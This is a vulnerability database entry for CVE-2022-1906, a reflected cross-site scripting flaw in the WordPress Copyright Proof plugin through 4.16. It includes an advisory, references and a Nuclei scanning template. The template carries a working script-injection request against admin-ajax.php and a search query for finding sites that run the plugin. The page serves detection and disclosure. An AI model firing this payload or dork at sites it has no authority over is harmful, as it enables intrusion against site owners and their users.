WordPress Copyright Proof <=4.16 - Cross-Site-Scripting

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType

WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation

Reporter	Title	Published	Views	Family All 14
ATTACKERKB	CVE-2022-1906	1 Aug 202213:15	–	attackerkb
Circl	CVE-2022-1906	1 Aug 202216:17	–	circl
CNNVD	WordPress plugin Copyright Proof 跨站脚本漏洞	1 Aug 202200:00	–	cnnvd
CVE	CVE-2022-1906	1 Aug 202212:48	–	cve
Cvelist	CVE-2022-1906 Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting	1 Aug 202212:48	–	cvelist
EUVD	EUVD-2022-25178	3 Oct 202520:07	–	euvd
NVD	CVE-2022-1906	1 Aug 202213:15	–	nvd
OSV	CVE-2022-1906	1 Aug 202213:15	–	osv
Patchstack	WordPress Copyright Proof plugin <= 4.16 - Reflected Cross-Site-Scripting (XSS) vulnerability	7 Jul 202200:00	–	patchstack
Prion	Cross site scripting	1 Aug 202213:15	–	prion

Source	Link
wpscan	www.wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
nvd	www.nvd.nist.gov/vuln/detail/CVE-2022-1906
github	www.github.com/ARPSyndicate/kenzer-templates
github	www.github.com/cyllective/CVEs

id: CVE-2022-1906

info:
  name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting
  author: random-robbie
  severity: medium
  description: |
    WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation.
  reference:
    - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1906
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1906
    cwe-id: CWE-79
    epss-score: 0.00922
    epss-percentile: 0.55841
    cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: digiprove
    product: copyright_proof
    framework: wordpress
    google-query: inurl:/wp-content/plugins/digiproveblog
  tags: cve,cve2022,wordpress,xss,wp-plugin,wp,wpscan,digiprove,vuln

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "got message <script>alert(document.domain)</script>"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d4b9b28f98d062d07b4c79133bf185afa7d3d7f6781a0eaf012c2c8752286f59022100e063a5bd9d7bd36b71cc40894aa6836a42e7daba777dc35ba9533856338e7830:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.2Medium risk

Vulners AI Score6.2

CVSS 3.16.1

EPSS0.00922